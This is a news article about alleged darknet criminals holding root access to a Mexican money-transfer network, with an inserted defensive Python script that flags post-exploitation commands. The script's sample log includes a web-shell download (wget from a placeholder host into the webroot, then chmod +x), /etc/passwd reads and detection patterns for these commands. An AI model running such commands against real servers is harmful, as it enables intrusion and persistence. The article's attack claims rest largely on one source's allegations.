The global banking system has been compromised by cybercriminals who have demonstrated they have high-level access that gives them nearly full control to alter data and steal from banks, according to an expert who has been investigating them on the darknet.
Ed Alexander is a cyberHUMINT (human intelligence) specialist and a subject matter expert on the darknet, the hidden networks reachable only with special software, where private forums run by hackers operate. Alongside its legitimate uses, the darknet is used by criminal groups to conspire and to sell illicit goods.
In a previous interview, Alexander provided Epoch Times with extensive evidence on the current global bank heist. He previously asked to remain anonymous in order to protect his investigations, but is now going public in order to expose the two groups of hackers who are behind the attacks.
The cyberattacks relate to a recent string of bank heists, including the theft of $81 million from the central bank of Bangladesh. Alexander has provided evidence that these banks are merely the tip of the iceberg, and that the hackers have found a vulnerability that grants them access to thousands of banks around the world and across the United States.
In the previous article, evidence provided by Alexander showed that the cyberattacks began around 2006, when hackers working for the Chinese military acted under state orders to breach critical networks in Mexico. From there, the hackers were able to gain access to the computer systems of a major bank, and then infiltrated a major money transfer network to which the bank—and many other banking institutions—are connected.
The Chinese hackers completed their assignment, and around June 2015 they sold the vulnerability they had exploited to cybercriminals on the darknet. Alexander was able to provide screenshots from posts on a darknet cybercriminal marketplace that was selling access to the Mexican financial networks.
The cybercriminals who purchased the vulnerability from the Chinese hackers are the ones currently carrying out attacks on the global banking system. Alexander provided new evidence showing the cybercriminals have high-level access to the banking networks and that they are using that access to alter data.
Epoch Times spoke with three experts on cybercrime (two on the record, one off the record), who were able to look over the screenshots of the attacks, which had been provided as evidence. In their expert opinions the screenshots are legitimate and their contents support Alexander’s claims.
According to James Scott, senior fellow at the Institute for Critical Infrastructure Technology (ICIT), the screenshots “suggest that an attacker may be exploiting a vulnerability in the system to establish a persistent presence and exfiltrate files.”
“Unless it is patched and the attacker is removed from the system,” Scott said, “the attacker can continue to capitalize from the vulnerability or sell it to other attackers.”
Based on screenshots provided by Alexander, Scott speculated that the cybercriminals may be using their access to the network as a gateway to other money transfer networks or to spoof money transfer requests to additional banks, allowing the hackers to steal money.
Keith Furst, founder of Data Derivatives, a consulting firm focused on financial cybercrime, noted that the screenshots show the cybercriminals have very high-level access on the banking networks. When it comes to banks, he said, only top-level permissions can alter data such as that shown in the screenshots, because of the risk that a person could, for example, eliminate his or her own debt or illegally transfer money.
“If they can change information at this level, it implies they have access to other information,” Furst said.
An Inside Look
The following are screenshots provided to Epoch Times by Alexander, which he said show cybercriminals actively accessing and altering data on networks belonging to UniTeller, a money transfer network owned by Banorte, Mexico’s third-largest bank.
He added red-colored notes on the screenshots to show that the timing of the attacks aligns with the current attacks on the global banks.
The above screenshot allegedly shows the cybercriminals stealing data from a banking network. Alexander said it shows them running a command on a remote host outside the security domain of the bank, and suggests the hackers accessed the data without having direct login credentials to the network.
The vulnerability also lets the hackers send commands to the servers remotely. “Remote code execution allowed the attackers to run any command on the system,” Alexander said. “It also facilitated upload of other malicious files, which provided greater, more permanent access.”
He noted the screenshot merely captures a single moment in the attack. He said after the hackers ran the command that displayed the data shown in the screenshot, they ran another command that allowed them to tamper with the files and steal data from the system.
The above screenshot was the result of the cybercriminals trying to prove they could manipulate back-end database systems on the banking network, which allows them, according to Alexander, “to effectively change credit limits on various card types.”
By changing the limits on the credit cards, the cybercriminals would be able to steal large amounts of money through fraudulent credit card transactions.
“The important thing here is that the attackers had access to the back-end databases and could easily manipulate, change, or destroy the data records and settings of UniTeller at will,” he said.
He said the screenshot was taken on May 26, but noted the March 2 timestamp suggests the cybercriminals could have been altering the system for close to three months.
Alexander said the above screenshot was the result of the cybercriminals showing proof of the time, date, and level of access they had gained to the banking system.
He noted that “along with the date, there was a screenshot returned of the system name string (uname -a command), its IP configuration data (ifconfig command) and a copy of the local password file to that particular server (/etc/passwd).”
The above screenshot shows the cybercriminals with “root” (administrative) access to the banking server. It also shows files and directories, which the cybercriminals were allegedly modifying when the screenshot was taken.
“Additionally, it is important to remember again, that the vulnerability being used here was run outside UniTeller’s security domain,” Alexander said. “Thus, the attackers were remotely executing code on that server, as they claimed.”
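The commands described above (`uname -a`, `ifconfig`, a read of `/etc/passwd`, followed by file uploads) are the conventional proof-of-access set that access brokers post, and on a defender's side they are also the signature of a remote-code-execution foothold being exercised. The following is an added example, not code from the article or from any of the parties it describes, showing how a SOC might flag that pattern in process-execution telemetry. It assumes a simplified, constructed log format (timestamp, `uid=`, `parent=`, `cmd=`) rather than any real auditd or EDR schema; the sample events, the host 198.51.100.7 and the path `/var/www/html/x.php` are invented for illustration.

```python
"""Flag RCE-style post-exploitation activity in process-execution records.

Three signals, in order of strength:
  1. A web-server process spawning an interactive shell (sh -c ...).
  2. A service account running several distinct recon commands within a
     short window (uname, ifconfig/ip, id/whoami/hostname, /etc/passwd).
  3. A service account fetching files or making them executable, i.e. the
     "upload of other malicious files" that turns a foothold into persistence.
The log format here is constructed for the example, not a real agent schema.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Accounts that should never run recon/persistence commands interactively.
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "tomcat"}
# Parent process names that indicate the command came from a web server.
WEB_PARENTS = {"httpd", "apache2", "nginx", "php-fpm", "java"}

RECON = {
    "uname": re.compile(r"^uname\b"),
    "ifconfig": re.compile(r"^(ifconfig|ip\s+(a|addr))\b"),
    "passwd": re.compile(r"^(cat|head|tail|less|more)\s+/etc/passwd\b"),
    "identity": re.compile(r"^(id|whoami|hostname)\b"),
}
SHELL = re.compile(r"^(sh|bash|dash|/bin/sh|/bin/bash)\b")
PERSIST = re.compile(r"^(wget|curl)\b|^chmod\s+\+x|^crontab\b|>\s*/tmp/")

# Constructed record format: "<ISO8601> uid=<user> parent=<comm> cmd=<argv>"
LINE = re.compile(r"^(?P<ts>\S+)\s+uid=(?P<user>\S+)\s+parent=(?P<parent>\S+)\s+cmd=(?P<cmd>.*)$")

# Constructed sample: an RCE session as www-data, then a benign admin login.
SAMPLE_EVENTS = [
    "2016-03-02T14:01:10Z uid=www-data parent=httpd cmd=sh -c id",
    "2016-03-02T14:01:10Z uid=www-data parent=sh cmd=id",
    "2016-03-02T14:01:35Z uid=www-data parent=sh cmd=uname -a",
    "2016-03-02T14:01:52Z uid=www-data parent=sh cmd=ifconfig",
    "2016-03-02T14:02:14Z uid=www-data parent=sh cmd=cat /etc/passwd",
    "2016-03-02T14:05:40Z uid=www-data parent=sh cmd=wget http://198.51.100.7/x.php -O /var/www/html/x.php",
    "2016-03-02T14:06:02Z uid=www-data parent=sh cmd=chmod +x /var/www/html/x.php",
    "2016-03-02T15:30:00Z uid=alice parent=sshd cmd=uname -a",
    "2016-03-02T15:30:05Z uid=alice parent=bash cmd=ifconfig",
]


def parse(line):
    """Return a dict with a datetime 'ts', or None for lines that do not match."""
    m = LINE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return ev


def classify(cmd):
    """Map a command line to ('recon', <name>), ('shell', ...), ('persist', ...) or (None, None)."""
    for name, rx in RECON.items():
        if rx.search(cmd):
            return "recon", name
    if SHELL.match(cmd):
        return "shell", "shell"
    if PERSIST.search(cmd):
        return "persist", "persist"
    return None, None


def analyze(lines, window=timedelta(minutes=10), min_recon=3):
    """Return a list of (finding, user, detail) tuples for the given records."""
    findings = []
    recon_hist = defaultdict(list)  # user -> [(ts, recon name)]
    chain_reported = set()
    for line in lines:
        ev = parse(line)
        if ev is None:
            continue
        kind, name = classify(ev["cmd"])
        if kind is None:
            continue
        user, parent, cmd = ev["user"], ev["parent"], ev["cmd"]
        if kind == "shell" and parent in WEB_PARENTS:
            findings.append(("WEB_PROCESS_SPAWNED_SHELL", user, cmd))
        elif kind == "persist" and user in SERVICE_ACCOUNTS:
            findings.append(("SERVICE_ACCOUNT_PERSISTENCE", user, cmd))
        elif kind == "recon" and user in SERVICE_ACCOUNTS:
            hist = recon_hist[user]
            hist.append((ev["ts"], name))
            # Distinct recon commands seen from this account inside the window.
            recent = {n for t, n in hist if ev["ts"] - t <= window}
            if len(recent) >= min_recon and user not in chain_reported:
                chain_reported.add(user)
                findings.append(("RECON_CHAIN", user, ",".join(sorted(recent))))
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(*finding, sep="\t")
```

The admin account `alice` runs two of the same recon commands over SSH and is not flagged: the rules key on who executed the command and from which parent, not on the commands alone. That matters for the evidence on this page as well: `/etc/passwd` is world-readable on a normal Linux host, so a screenshot of it demonstrates command execution but does not by itself demonstrate root; the separate root-prompt screenshot described below is what carries that claim.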
The above screenshot shows a directory and file structure, which Alexander said was provided by the cybercriminals to show they were able to move between directories.
The cybercriminals were interested in this particular directory, he said, since they claimed it allowed them to access a U.S. bank that UniTeller has a relationship with.
He said this screenshot was also important, since the cybercriminals had previously demonstrated “that they had full credentials to UniTeller’s systems and services and had the ability to change them at will.”
He also states that this is only a snapshot in time of a significant cybercrime that is currently in progress.